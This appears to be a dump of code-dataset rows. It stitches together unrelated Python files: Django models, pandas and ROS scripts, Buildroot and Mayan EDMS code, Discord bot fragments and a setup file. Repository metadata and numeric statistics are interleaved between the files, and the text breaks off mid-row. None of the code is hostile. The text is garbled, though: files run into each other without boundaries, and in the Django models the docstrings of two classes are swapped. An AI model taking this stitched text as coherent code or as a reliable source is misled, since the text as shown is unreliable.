# 一般情况下, InnoDB在建表时, 当没有定义Primary Key时,
# 如果有 Unique Key 时, InnoDB会将该Unique Key当作聚集索引.
# 如果也没有 Unique Key时, InnoDB会创建一个隐藏的PrimaryKey(聚集索引).
#
#
# 所以, 像这样的建表语句, Model无法百分之百还原.
# CREATE TABLE `salaries` (
# `emp_no` int(11) NOT NULL,
# `salary` int(11) NOT NULL,
# `from_date` date NOT NULL,
# `to_date` date NOT NULL,
# PRIMARY KEY (`emp_no`,`from_date`)
# );
class salaries(models.Model):
"""
CREATE TABLE `SQL3_dept_manager` (
`id` integer AUTO_INCREMENT NOT NULL PRIMARY KEY,
`dept_no` varchar(4) NOT NULL,
`emp_no` integer NOT NULL,
`to_date` date NOT NULL
);
ALTER TABLE `SQL3_salaries` ADD CONSTRAINT `uc_emp_no_from_date` UNIQUE (`emp_no`, `from_date`);
"""
emp_no = models.IntegerField(verbose_name="员工编号", null=False)
salary = models.IntegerField(verbose_name="薪资", null=False)
from_date = models.DateField(verbose_name="from_date", null=False)
to_date = models.DateField(verbose_name="to_date", null=False)
class Meta:
constraints = [models.UniqueConstraint(fields=['emp_no', 'from_date'], name="uc_emp_no_from_date"), ]
class dept_manager(models.Model):
"""
CREATE TABLE `SQL3_salaries` (
`id` integer AUTO_INCREMENT NOT NULL PRIMARY KEY,
`emp_no` integer NOT NULL,
`salary` integer NOT NULL,
`from_date` date NOT NULL,
`to_date` date NOT NULL
);
ALTER TABLE `SQL3_dept_manager` ADD CONSTRAINT `uc_emp_no_dept_no` UNIQUE (`emp_no`, `dept_no`);
"""
dept_no = models.CharField(verbose_name="部门编号", max_length=4, null=False)
emp_no = models.IntegerField(verbose_name="员工编号", null=False)
to_date = models.DateField(verbose_name="to_date", null=False)
class Meta:
constraints = [models.UniqueConstraint(fields=['emp_no', 'dept_no'], name="uc_emp_no_dept_no"), ]
| 33.52459
| 109
| 0.684597
| 1,502
| 0.655609
| 0
| 0
| 0
| 0
| 0
| 0
| 1,561
| 0.681362
|
3be3d29eecfe1ea6c347859c1388d314f37ccbc5
| 1,247
|
py
|
Python
|
concat_csv.py
|
jweckman/vim
|
c225f36ab05c2bdcedfc9866c367c1ddc4cd3646
|
[
"MIT"
] | null | null | null |
concat_csv.py
|
jweckman/vim
|
c225f36ab05c2bdcedfc9866c367c1ddc4cd3646
|
[
"MIT"
] | null | null | null |
concat_csv.py
|
jweckman/vim
|
c225f36ab05c2bdcedfc9866c367c1ddc4cd3646
|
[
"MIT"
] | null | null | null |
import pandas as pd
from pathlib import Path
import sys
''' Concatenates all csv files in the folder passed to stdin '''
path = Path(sys.argv[1])
def get_csv_paths(path):
return [p for p in path.iterdir() if p.suffix == '.csv']
def ask_details():
print('Please specify the following:')
encoding = input('Encoding\n')
delimiter = input('Delimiter\n')
return encoding, delimiter
def get_frames(files_list, encoding, delimiter):
return [pd.read_csv(p, sep=delimiter, dtype='str', encoding=encoding) for p in csv_files]
def concat_output(frames):
output = pd.DataFrame()
for df in frames:
output = pd.concat([output,df])
path_out = path / 'COMBINED.csv'
output.to_csv(path_out, sep=';', index=False)
if __name__ == '__main__':
csv_files = get_csv_paths(path)
encoding, delimiter = ask_details()
try:
frames = get_frames(csv_files, encoding, delimiter)
concat_output(frames)
except Exception as e:
print('Seems like there were files that could not be read\n')
print(str(e))
encoding, delimiter = ask_details()
frames = get_frames(csv_files, encoding, delimiter)
concat_output(frames)
| 30.414634
| 94
| 0.653569
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 212
| 0.170008
|
3be3ffc19dbd5fc20c5420fc3ab9c6320aeeee0a
| 2,589
|
py
|
Python
|
catkin_ws/src/rostest_example/tests/duckiecall_tester_node.py
|
DiegoOrtegoP/Software
|
4a07dd2dab29db910ca2e26848fa6b53b7ab00cd
|
[
"CC-BY-2.0"
] | 12
|
2016-04-14T12:21:46.000Z
|
2021-06-18T07:51:40.000Z
|
catkin_ws/src/rostest_example/tests/duckiecall_tester_node.py
|
DiegoOrtegoP/Software
|
4a07dd2dab29db910ca2e26848fa6b53b7ab00cd
|
[
"CC-BY-2.0"
] | 14
|
2017-03-03T23:33:05.000Z
|
2018-04-03T18:07:53.000Z
|
catkin_ws/src/rostest_example/tests/duckiecall_tester_node.py
|
DiegoOrtegoP/Software
|
4a07dd2dab29db910ca2e26848fa6b53b7ab00cd
|
[
"CC-BY-2.0"
] | 113
|
2016-05-03T06:11:42.000Z
|
2019-06-01T14:37:38.000Z
|
#!/usr/bin/env python
import rospy
import unittest, rostest
from rostest_example.Quacker import *
from std_msgs.msg import String, Int32
class DuckiecallTesterNode(unittest.TestCase):
def __init__(self, *args):
super(DuckiecallTesterNode, self).__init__(*args)
self.msg_duckiecall = String()
self.msg_received = False
def setup(self):
# Setup the node
rospy.init_node('duckiecall_tester_node', anonymous=False)
# Setup the publisher and subscriber
self.pub_num_of_quacks = rospy.Publisher("~number_of_quacks", Int32, queue_size=1, latch=True)
self.sub_duckiecall = rospy.Subscriber("~duckiecall", String, self.duckiecallCallback)
# Wait for the node to finish starting up
timeout = rospy.Time.now() + rospy.Duration(5) # Wait at most 5 seconds for the node to come up
while (self.pub_num_of_quacks.get_num_connections() < 1 or self.sub_duckiecall.get_num_connections() < 1) and \
not rospy.is_shutdown() and rospy.Time.now() < timeout:
rospy.sleep(0.1)
def duckiecallCallback(self, msg_duckiecall):
self.msg_duckiecall = msg_duckiecall
self.msg_received = True
def test_publisher_and_subscriber(self):
self.setup() # Setup the node
self.assertGreaterEqual(self.pub_num_of_quacks.get_num_connections(), 1, "No connections found on num_of_quacks topic")
self.assertGreaterEqual(self.sub_duckiecall.get_num_connections(), 1, "No connections found on duckiecall topic")
def test_duckiecall_output(self):
self.setup() # Setup the node
# Send the message to the number_of_quacks topic
msg_num_of_quacks = Int32()
msg_num_of_quacks.data = 3
self.pub_num_of_quacks.publish(msg_num_of_quacks)
# Wait for the message to be received
timeout = rospy.Time.now() + rospy.Duration(5) # Wait at most 5 seconds for the node to reply
while not self.msg_received and not rospy.is_shutdown() and rospy.Time.now() < timeout:
rospy.sleep(0.1)
# Send an error if the timeout was hit
self.assertLess(rospy.Time.now(), timeout, "The test timed out with no response from the duckiecall_node")
# Test the response
response = self.msg_duckiecall.data
self.assertEqual(response, "Quack! Quack! Quack!") # Three Quacks! expected
if __name__ == '__main__':
rospy.init_node('duckiecall_tester_node', anonymous=False)
rostest.rosrun('rostest_example', 'duckiecall_tester_node', DuckiecallTesterNode)
| 43.15
| 127
| 0.696794
| 2,273
| 0.877945
| 0
| 0
| 0
| 0
| 0
| 0
| 709
| 0.273851
|
3be4dea35fbe812684c863cfb56967cde0971e92
| 1,679
|
py
|
Python
|
buildroot/support/testing/tests/init/test_busybox.py
|
rbrenton/hassos
|
fa6f7ac74ddba50e76f5779c613c56d937684844
|
[
"Apache-2.0"
] | 617
|
2015-01-04T14:33:56.000Z
|
2022-03-24T22:42:25.000Z
|
buildroot/support/testing/tests/init/test_busybox.py
|
rbrenton/hassos
|
fa6f7ac74ddba50e76f5779c613c56d937684844
|
[
"Apache-2.0"
] | 631
|
2015-01-01T22:53:25.000Z
|
2022-03-17T18:41:00.000Z
|
buildroot/support/testing/tests/init/test_busybox.py
|
rbrenton/hassos
|
fa6f7ac74ddba50e76f5779c613c56d937684844
|
[
"Apache-2.0"
] | 133
|
2015-03-03T18:40:05.000Z
|
2022-03-18T13:34:26.000Z
|
import infra.basetest
from tests.init.base import InitSystemBase as InitSystemBase
class InitSystemBusyboxBase(InitSystemBase):
config = infra.basetest.BASIC_TOOLCHAIN_CONFIG + \
"""
# BR2_TARGET_ROOTFS_TAR is not set
"""
def check_init(self):
super(InitSystemBusyboxBase, self).check_init("/bin/busybox")
class TestInitSystemBusyboxRo(InitSystemBusyboxBase):
config = InitSystemBusyboxBase.config + \
"""
# BR2_TARGET_GENERIC_REMOUNT_ROOTFS_RW is not set
BR2_TARGET_ROOTFS_SQUASHFS=y
"""
def test_run(self):
self.start_emulator("squashfs")
self.check_init()
self.check_network("eth0", 1)
class TestInitSystemBusyboxRw(InitSystemBusyboxBase):
config = InitSystemBusyboxBase.config + \
"""
BR2_TARGET_ROOTFS_EXT2=y
"""
def test_run(self):
self.start_emulator("ext2")
self.check_init()
self.check_network("eth0", 1)
class TestInitSystemBusyboxRoNet(InitSystemBusyboxBase):
config = InitSystemBusyboxBase.config + \
"""
BR2_SYSTEM_DHCP="eth0"
# BR2_TARGET_GENERIC_REMOUNT_ROOTFS_RW is not set
BR2_TARGET_ROOTFS_SQUASHFS=y
"""
def test_run(self):
self.start_emulator("squashfs")
self.check_init()
self.check_network("eth0")
class TestInitSystemBusyboxRwNet(InitSystemBusyboxBase):
config = InitSystemBusyboxBase.config + \
"""
BR2_SYSTEM_DHCP="eth0"
BR2_TARGET_ROOTFS_EXT2=y
"""
def test_run(self):
self.start_emulator("ext2")
self.check_init()
self.check_network("eth0")
| 25.830769
| 69
| 0.659321
| 1,581
| 0.941632
| 0
| 0
| 0
| 0
| 0
| 0
| 506
| 0.30137
|
3be559b23f04ad4fbb4310964aaa62522258d721
| 8,529
|
py
|
Python
|
mayan/apps/linking/api_views.py
|
darrenflexxu/Mayan-EDMS
|
6707365bfacd137e625ddc1b990168012246fa07
|
[
"Apache-2.0"
] | null | null | null |
mayan/apps/linking/api_views.py
|
darrenflexxu/Mayan-EDMS
|
6707365bfacd137e625ddc1b990168012246fa07
|
[
"Apache-2.0"
] | 5
|
2021-03-19T22:59:52.000Z
|
2022-03-12T00:13:16.000Z
|
mayan/apps/linking/api_views.py
|
Sumit-Kumar-Jha/mayan
|
5b7ddeccf080b9e41cc1074c70e27dfe447be19f
|
[
"Apache-2.0"
] | 1
|
2020-07-29T21:03:27.000Z
|
2020-07-29T21:03:27.000Z
|
from __future__ import absolute_import, unicode_literals
from django.shortcuts import get_object_or_404
from mayan.apps.acls.models import AccessControlList
from mayan.apps.documents.models import Document
from mayan.apps.documents.permissions import permission_document_view
from mayan.apps.rest_api import generics
from .models import SmartLink
from .permissions import (
permission_smart_link_create, permission_smart_link_delete,
permission_smart_link_edit, permission_smart_link_view
)
from .serializers import (
ResolvedSmartLinkDocumentSerializer, ResolvedSmartLinkSerializer,
SmartLinkConditionSerializer, SmartLinkSerializer,
WritableSmartLinkSerializer
)
class APIResolvedSmartLinkDocumentListView(generics.ListAPIView):
"""
get: Returns a list of the smart link documents that apply to the document.
"""
mayan_object_permissions = {'GET': (permission_document_view,)}
serializer_class = ResolvedSmartLinkDocumentSerializer
def get_document(self):
document = get_object_or_404(klass=Document, pk=self.kwargs['pk'])
AccessControlList.objects.check_access(
obj=document, permissions=(permission_document_view,),
user=self.request.user
)
return document
def get_smart_link(self):
smart_link = get_object_or_404(
klass=SmartLink.objects.get_for(document=self.get_document()),
pk=self.kwargs['smart_link_pk']
)
AccessControlList.objects.check_access(
obj=smart_link, permissions=(permission_smart_link_view,),
user=self.request.user
)
return smart_link
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
context = super(
APIResolvedSmartLinkDocumentListView, self
).get_serializer_context()
if self.kwargs:
context.update(
{
'document': self.get_document(),
'smart_link': self.get_smart_link(),
}
)
return context
def get_queryset(self):
return self.get_smart_link().get_linked_document_for(
document=self.get_document()
)
class APIResolvedSmartLinkView(generics.RetrieveAPIView):
"""
get: Return the details of the selected resolved smart link.
"""
lookup_url_kwarg = 'smart_link_pk'
mayan_object_permissions = {'GET': (permission_smart_link_view,)}
serializer_class = ResolvedSmartLinkSerializer
def get_document(self):
document = get_object_or_404(klass=Document, pk=self.kwargs['pk'])
AccessControlList.objects.check_access(
obj=document, permissions=(permission_document_view,),
user=self.request.user
)
return document
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
context = super(APIResolvedSmartLinkView, self).get_serializer_context()
if self.kwargs:
context.update(
{
'document': self.get_document(),
}
)
return context
def get_queryset(self):
return SmartLink.objects.get_for(document=self.get_document())
class APIResolvedSmartLinkListView(generics.ListAPIView):
"""
get: Returns a list of the smart links that apply to the document.
"""
mayan_object_permissions = {'GET': (permission_smart_link_view,)}
serializer_class = ResolvedSmartLinkSerializer
def get_document(self):
document = get_object_or_404(klass=Document, pk=self.kwargs['pk'])
AccessControlList.objects.check_access(
obj=document, permissions=(permission_document_view,),
user=self.request.user
)
return document
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
context = super(APIResolvedSmartLinkListView, self).get_serializer_context()
if self.kwargs:
context.update(
{
'document': self.get_document(),
}
)
return context
def get_queryset(self):
return SmartLink.objects.filter(
document_types=self.get_document().document_type
)
class APISmartLinkConditionListView(generics.ListCreateAPIView):
"""
get: Returns a list of all the smart link conditions.
post: Create a new smart link condition.
"""
serializer_class = SmartLinkConditionSerializer
def get_queryset(self):
return self.get_smart_link().conditions.all()
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
context = super(APISmartLinkConditionListView, self).get_serializer_context()
if self.kwargs:
context.update(
{
'smart_link': self.get_smart_link(),
}
)
return context
def get_smart_link(self):
if self.request.method == 'GET':
permission_required = permission_smart_link_view
else:
permission_required = permission_smart_link_edit
smart_link = get_object_or_404(klass=SmartLink, pk=self.kwargs['pk'])
AccessControlList.objects.check_access(
obj=smart_link, permissions=(permission_required,),
user=self.request.user
)
return smart_link
class APISmartLinkConditionView(generics.RetrieveUpdateDestroyAPIView):
"""
delete: Delete the selected smart link condition.
get: Return the details of the selected smart link condition.
patch: Edit the selected smart link condition.
put: Edit the selected smart link condition.
"""
lookup_url_kwarg = 'condition_pk'
serializer_class = SmartLinkConditionSerializer
def get_queryset(self):
return self.get_smart_link().conditions.all()
def get_serializer_context(self):
"""
Extra context provided to the serializer class.
"""
context = super(APISmartLinkConditionView, self).get_serializer_context()
if self.kwargs:
context.update(
{
'smart_link': self.get_smart_link(),
}
)
return context
def get_smart_link(self):
if self.request.method == 'GET':
permission_required = permission_smart_link_view
else:
permission_required = permission_smart_link_edit
smart_link = get_object_or_404(klass=SmartLink, pk=self.kwargs['pk'])
AccessControlList.objects.check_access(
obj=smart_link, permissions=(permission_required,),
user=self.request.user
)
return smart_link
class APISmartLinkListView(generics.ListCreateAPIView):
"""
get: Returns a list of all the smart links.
post: Create a new smart link.
"""
mayan_object_permissions = {'GET': (permission_smart_link_view,)}
mayan_view_permissions = {'POST': (permission_smart_link_create,)}
queryset = SmartLink.objects.all()
def get_serializer(self, *args, **kwargs):
if not self.request:
return None
return super(APISmartLinkListView, self).get_serializer(*args, **kwargs)
def get_serializer_class(self):
if self.request.method == 'GET':
return SmartLinkSerializer
else:
return WritableSmartLinkSerializer
class APISmartLinkView(generics.RetrieveUpdateDestroyAPIView):
"""
delete: Delete the selected smart link.
get: Return the details of the selected smart link.
patch: Edit the selected smart link.
put: Edit the selected smart link.
"""
mayan_object_permissions = {
'DELETE': (permission_smart_link_delete,),
'GET': (permission_smart_link_view,),
'PATCH': (permission_smart_link_edit,),
'PUT': (permission_smart_link_edit,)
}
queryset = SmartLink.objects.all()
def get_serializer(self, *args, **kwargs):
if not self.request:
return None
return super(APISmartLinkView, self).get_serializer(*args, **kwargs)
def get_serializer_class(self):
if self.request.method == 'GET':
return SmartLinkSerializer
else:
return WritableSmartLinkSerializer
| 30.569892
| 85
| 0.653183
| 7,820
| 0.916872
| 0
| 0
| 0
| 0
| 0
| 0
| 1,435
| 0.16825
|
3be6d032aab66cc3f999f8f1017e760af49f209f
| 4,013
|
py
|
Python
|
download_stats.py
|
zhengsipeng/kinetics-downloader
|
c85c6946a4408d1f9219441ae3f7aed679b10458
|
[
"MIT"
] | 263
|
2018-03-10T15:44:35.000Z
|
2022-03-16T10:57:30.000Z
|
download_stats.py
|
zhengsipeng/kinetics-downloader
|
c85c6946a4408d1f9219441ae3f7aed679b10458
|
[
"MIT"
] | 17
|
2018-09-13T00:30:22.000Z
|
2021-07-26T17:42:33.000Z
|
download_stats.py
|
zhengsipeng/kinetics-downloader
|
c85c6946a4408d1f9219441ae3f7aed679b10458
|
[
"MIT"
] | 85
|
2018-07-12T03:45:38.000Z
|
2022-03-21T23:11:36.000Z
|
import argparse, os
import lib.config as config
import lib.utils as utils
def count_present_and_missing(cls, directory, metadata):
"""
Count present and missing videos for a class based on metadata.
:param cls: The class. If None, count all videos (used for testing videos - no classes).
:param directory: Directory containing the videos.
:param metadata: Kinetics metadata json.
:return: Tuple: number present videos, number of missing videos
"""
present = 0
missing = 0
for key in metadata:
if cls is None or metadata[key]["annotations"]["label"] == cls:
if os.path.isfile(os.path.join(directory, "{}.mp4".format(key))):
present += 1
else:
missing += 1
return present, missing
def main(args):
# load video classes
classes = utils.load_json(config.CLASSES_PATH)
# load lists of videos
train_metadata = utils.load_json(config.TRAIN_METADATA_PATH)
val_metadata = utils.load_json(config.VAL_METADATA_PATH)
test_metadata = utils.load_json(config.TEST_METADATA_PATH)
num_found = 0
total = 0
total_train_present = 0
total_train_missing = 0
total_val_present = 0
total_val_missing = 0
# load subset
subset = None
if args.subset:
subset = utils.load_json(args.subset)
# count train and validation videos
for cls in classes:
if subset is not None and cls not in subset:
continue
total += 1
cls_train_path = os.path.join(config.TRAIN_ROOT, cls.replace(" ", "_"))
cls_valid_path = os.path.join(config.VALID_ROOT, cls.replace(" ", "_"))
train_found = False
valid_found = False
if os.path.isdir(cls_train_path):
train_present, train_missing = count_present_and_missing(cls, cls_train_path, train_metadata)
train_found = True
total_train_present += train_present
total_train_missing += train_missing
if os.path.isdir(cls_valid_path):
valid_present, valid_missing = count_present_and_missing(cls, cls_valid_path, val_metadata)
valid_found = True
total_val_present += valid_present
total_val_missing += valid_missing
if train_found or valid_found:
num_found += 1
if args.details:
print("class {}".format(cls))
if train_found:
print("train: {} / {}".format(train_present, train_present + train_missing))
if valid_found:
print("valid: {} / {}".format(valid_present, valid_present + valid_missing))
print()
# count test videos
test_present, test_missing = count_present_and_missing(None, config.TEST_ROOT, test_metadata)
# print
train_percent_found = 0
if total_train_present > 0:
train_percent_found = (total_train_present * 100) / (total_train_present + total_train_missing)
valid_percent_found = 0
if total_val_present > 0:
valid_percent_found = (total_val_present * 100) / (total_val_present + total_val_missing)
test_percent_found = 0
if test_present > 0:
test_percent_found = (test_present * 100) / (test_present + test_missing)
print("class stats:")
print("\t{:d} / {:d} classes found".format(num_found, total))
print()
print("video stats (only for found classes):")
print("\t{:d} / {:d} ({:.2f}%) train videos found".format(
total_train_present, total_train_present + total_train_missing, train_percent_found))
print("\t{:d} / {:d} ({:.2f}%) valid videos found".format(
total_val_present, total_val_present + total_val_missing, valid_percent_found))
print("\t{:d} / {:d} ({:.2f}%) test videos found".format(
test_present, test_present + test_missing, test_percent_found))
if __name__ == "__main__":
parser = argparse.ArgumentParser("Print statistics about downloaded videos.")
parser.add_argument("-d", "--details", action="store_true", default=False, help="detailed stats for each found class")
parser.add_argument("-s", "--subset", help="path to a JSON file containing a subset of Kinetics classes")
parsed = parser.parse_args()
main(parsed)
| 31.108527
| 120
| 0.697982
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 963
| 0.23997
|
3be947a82f13de6d26fc798282d17c1307b2aaf7
| 257
|
py
|
Python
|
ex-mundo3/ex107/moeda.py
|
PedroPegado/ex-cursoemvideo
|
46751a7238e6a142b639c4cc3acf1759411732d7
|
[
"MIT"
] | null | null | null |
ex-mundo3/ex107/moeda.py
|
PedroPegado/ex-cursoemvideo
|
46751a7238e6a142b639c4cc3acf1759411732d7
|
[
"MIT"
] | null | null | null |
ex-mundo3/ex107/moeda.py
|
PedroPegado/ex-cursoemvideo
|
46751a7238e6a142b639c4cc3acf1759411732d7
|
[
"MIT"
] | null | null | null |
def aumentar(preco, taxa):
p = preco + (preco * taxa/100)
return p
def diminuir(preco, taxa):
p = preco - (preco * taxa/100)
return p
def dobro(preco):
p = preco * 2
return p
def metade(preco):
p = preco / 2
return p
| 12.238095
| 34
| 0.564202
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3beac65b5cb6099092c07d4a94aab675261b906d
| 3,885
|
py
|
Python
|
e2e/test_accessbot_show_resources.py
|
arthurSena0704/accessbot
|
5097453c45c5193e6516bc1f9441e90e49b3d324
|
[
"Apache-2.0"
] | null | null | null |
e2e/test_accessbot_show_resources.py
|
arthurSena0704/accessbot
|
5097453c45c5193e6516bc1f9441e90e49b3d324
|
[
"Apache-2.0"
] | null | null | null |
e2e/test_accessbot_show_resources.py
|
arthurSena0704/accessbot
|
5097453c45c5193e6516bc1f9441e90e49b3d324
|
[
"Apache-2.0"
] | 3
|
2021-08-16T22:34:05.000Z
|
2021-09-22T02:51:13.000Z
|
# pylint: disable=invalid-name
import pytest
import sys
from unittest.mock import MagicMock
from test_common import create_config, DummyResource
sys.path.append('plugins/sdm')
from lib import ShowResourcesHelper
pytest_plugins = ["errbot.backends.test"]
extra_plugin_dir = 'plugins/sdm'
class Test_show_resources:
@pytest.fixture
def mocked_testbot(self, testbot):
config = create_config()
return inject_mocks(testbot, config)
def test_show_resources_command(self, mocked_testbot):
mocked_testbot.push_message("show available resources")
message = mocked_testbot.pop_message()
assert "Aaa (type: DummyResource)" in message
assert "Bbb (type: DummyResource)" in message
class Test_not_show_hidden_resources:
@pytest.fixture
def mocked_testbot_hide_resource_true(self, testbot):
config = create_config()
config['HIDE_RESOURCE_TAG'] = 'hide-resource'
resources = [ DummyResource("Bbb", {}), DummyResource("Aaa", {'hide-resource': True}) ]
return inject_mocks(testbot, config, resources)
@pytest.fixture
def mocked_testbot_hide_resource_false(self, testbot):
config = create_config()
config['HIDE_RESOURCE_TAG'] = 'hide-resource'
resources = [ DummyResource("Bbb", {}), DummyResource("Aaa", {'hide-resource': False}) ]
return inject_mocks(testbot, config, resources)
def test_show_resources_when_hide_resource_tag_true(self, mocked_testbot_hide_resource_true):
mocked_testbot_hide_resource_true.push_message("show available resources")
message = mocked_testbot_hide_resource_true.pop_message()
assert "Aaa (type: DummyResource)" not in message
assert "Bbb (type: DummyResource)" in message
def test_show_resources_when_hide_resource_tag_false(self, mocked_testbot_hide_resource_false):
mocked_testbot_hide_resource_false.push_message("show available resources")
message = mocked_testbot_hide_resource_false.pop_message()
assert "Aaa (type: DummyResource)" in message
assert "Bbb (type: DummyResource)" in message
class Test_show_resources_by_role:
@pytest.fixture
def mocked_testbot(self, testbot):
config = create_config()
config['CONTROL_RESOURCES_ROLE_NAME'] = 'myrole'
resources_by_role = [ DummyResource("Bbb in role", {}), DummyResource("Aaa in role", {}) ]
return inject_mocks(testbot, config, resources_by_role = resources_by_role)
def test_show_resources_command(self, mocked_testbot):
mocked_testbot.push_message("show available resources")
message = mocked_testbot.pop_message()
assert "Aaa in role (type: DummyResource)" in message
assert "Bbb in role (type: DummyResource)" in message
def default_dummy_resources():
return [ DummyResource("Bbb", {}), DummyResource("Aaa", {}) ]
# pylint: disable=dangerous-default-value
def inject_mocks(testbot, config, resources = default_dummy_resources(), resources_by_role = []):
accessbot = testbot.bot.plugin_manager.plugins['AccessBot']
accessbot.config = config
accessbot.get_admins = MagicMock(return_value = ["gbin@localhost"])
accessbot.get_api_access_key = MagicMock(return_value = "api-access_key")
accessbot.get_api_secret_key = MagicMock(return_value = "c2VjcmV0LWtleQ==") # valid base64 string
accessbot.get_sdm_service = MagicMock(return_value = create_sdm_service_mock(resources, resources_by_role))
accessbot.get_show_resources_helper = MagicMock(return_value = ShowResourcesHelper(accessbot))
return testbot
def create_sdm_service_mock(resources, resources_by_role):
service_mock = MagicMock()
service_mock.get_all_resources = MagicMock(return_value = resources)
service_mock.get_all_resources_by_role = MagicMock(return_value = resources_by_role)
return service_mock
| 45.174419
| 111
| 0.7426
| 2,497
| 0.642728
| 0
| 0
| 1,085
| 0.279279
| 0
| 0
| 728
| 0.187387
|
3beb73cbef34b508a909878716873d4472cedd74
| 64
|
py
|
Python
|
tftf/layers/activations/tanh.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 35
|
2018-08-11T05:01:41.000Z
|
2021-01-29T02:28:47.000Z
|
tftf/layers/activations/tanh.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | null | null | null |
tftf/layers/activations/tanh.py
|
yusugomori/tftf
|
e98b9ddffdbaa1fe04320437a47f12f3182ab6f3
|
[
"Apache-2.0"
] | 4
|
2018-10-19T14:12:04.000Z
|
2021-01-29T02:28:49.000Z
|
import tensorflow as tf
def tanh(x):
return tf.nn.tanh(x)
| 10.666667
| 24
| 0.671875
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
3becb3cb8a9347c5c892e9c12331df179e27be0f
| 406
|
py
|
Python
|
game/migrations/0011_onlinegame_playersready.py
|
dimamelnik22/drawfulru
|
da2d21ef4c0b6776fc7c1059dbdf617f591c4ef8
|
[
"Apache-2.0"
] | null | null | null |
game/migrations/0011_onlinegame_playersready.py
|
dimamelnik22/drawfulru
|
da2d21ef4c0b6776fc7c1059dbdf617f591c4ef8
|
[
"Apache-2.0"
] | 7
|
2020-06-05T20:14:47.000Z
|
2021-09-22T18:18:06.000Z
|
game/migrations/0011_onlinegame_playersready.py
|
dimamelnik22/drawfulru
|
da2d21ef4c0b6776fc7c1059dbdf617f591c4ef8
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 3.0 on 2019-12-23 06:19
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('game', '0010_auto_20191223_0818'),
]
operations = [
migrations.AddField(
model_name='onlinegame',
name='playersready',
field=models.IntegerField(default=0),
),
]
| 21.368421
| 50
| 0.576355
| 309
| 0.761084
| 0
| 0
| 0
| 0
| 0
| 0
| 103
| 0.253695
|
3bed882365f0c947238e86347d95e522a56968a9
| 2,380
|
py
|
Python
|
deprecated.py
|
tungr/CoeusBot
|
90bdc869a1f8c077a1f88dcf1335d20a19d49fee
|
[
"MIT"
] | null | null | null |
deprecated.py
|
tungr/CoeusBot
|
90bdc869a1f8c077a1f88dcf1335d20a19d49fee
|
[
"MIT"
] | null | null | null |
deprecated.py
|
tungr/CoeusBot
|
90bdc869a1f8c077a1f88dcf1335d20a19d49fee
|
[
"MIT"
] | null | null | null |
#### Transfer data from JSON file to MongoDB ####
# @client.command()
# async def qupload(self, ctx):
# mclient = MongoClient(host="localhost", port=27017)
# db = mclient.coeusbot
# quotesdb = db.quotes
# with open('quotes.json', 'r') as f:
# quotes = json.load(f)
# for quotenum in range(1, len(quotes)):
# datetime = quotes[str(quotenum)]['date_time']
# author = quotes[str(quotenum)]['author']
# quote = quotes[str(quotenum)]['quote']
# guild = ctx.guild.id
# qamount = quotesdb.find({"guild": ctx.guild.id}) # Grab all quotes of same guild id
# qid = 1
# # Increment qid based on # of quotes in guild
# for qnum in qamount:
# qid += 1
# mquote = {
# "datetime": datetime,
# "author": author,
# "quote": quote,
# "guild": guild,
# "qid": qid
# }
# result = quotesdb.insert_one(mquote)
# mclient.close()
# await ctx.reply(f'Quotes transferred')
#### Add quote to JSON file ####
# @client.command(aliases=['qua'])
# async def quoteadd(self, ctx, *quote):
# with open('quotes.json', 'r') as f:
# quotes = json.load(f)
# if str(len(quotes)+1) not in quotes:
# now = dt.datetime.now()
# date_time = now.strftime("%m/%d/%Y, %I:%M%p")
# q_amount = len(quotes) + 1
# quotes[str(q_amount)] = {}
# quotes[str(q_amount)]['quote'] = quote
# quotes[str(q_amount)]['date_time'] = date_time
# quotes[str(q_amount)]['author'] = str(ctx.author)
# with open('quotes.json', 'w') as f:
# json.dump(quotes, f)
# await ctx.reply(f'Quote added')
#### Grab quote from JSON file ####
# @client.command()
# async def quotes(self, ctx):
# with open('quotes.json', 'r') as f:
# quotes = json.load(f)
# randquote = random.randint(1,len(quotes))
# quote = quotes[str(randquote)]['quote']
# date_time = quotes[str(randquote)]['date_time']
# author = quotes[str(randquote)]['author']
# quote_embed = discord.Embed(title=f'💬 Quote #{randquote}', color=0x03fcce)
# newquote = ' '.join(quote)
# quote_embed.add_field(name='\u200b', value=f'{newquote}', inline=False)
# quote_embed.set_footer(text=f'{date_time}')
# await ctx.send(embed=quote_embed)
| 32.162162
| 93
| 0.561765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,298
| 0.964331
|
3bedf4765622764f7282bd201ee9a488ae9fdbd2
| 370
|
py
|
Python
|
packaging/scripts/collect_matlab.py
|
robotraconteur/robotraconteur
|
ff997351761a687be364234684202e3348c4083c
|
[
"Apache-2.0"
] | 37
|
2019-01-31T06:05:17.000Z
|
2022-03-21T06:56:18.000Z
|
packaging/scripts/collect_matlab.py
|
robotraconteur/robotraconteur
|
ff997351761a687be364234684202e3348c4083c
|
[
"Apache-2.0"
] | 14
|
2019-07-18T04:09:45.000Z
|
2021-08-31T02:04:22.000Z
|
packaging/scripts/collect_matlab.py
|
robotraconteur/robotraconteur
|
ff997351761a687be364234684202e3348c4083c
|
[
"Apache-2.0"
] | 3
|
2018-11-23T22:03:22.000Z
|
2021-11-02T10:03:39.000Z
|
import shutil
import pathlib
asset_dirs = ["artifacts/main", "artifacts/build_python_version"]
pathlib.Path("distfiles").mkdir(exist_ok=True)
for asset_dir in asset_dirs:
for fname in list(pathlib.Path(asset_dir).glob('**/RobotRaconteur-*-MATLAB*')):
print(fname)
dest = pathlib.Path(fname)
shutil.copy(str(fname),"distfiles/" + dest.name)
| 30.833333
| 83
| 0.705405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 100
| 0.27027
|
3bee8a2e3ce8d0e0dbf5627d1dd4f2bc366b92ab
| 821
|
py
|
Python
|
setup.py
|
bryan-he/closek
|
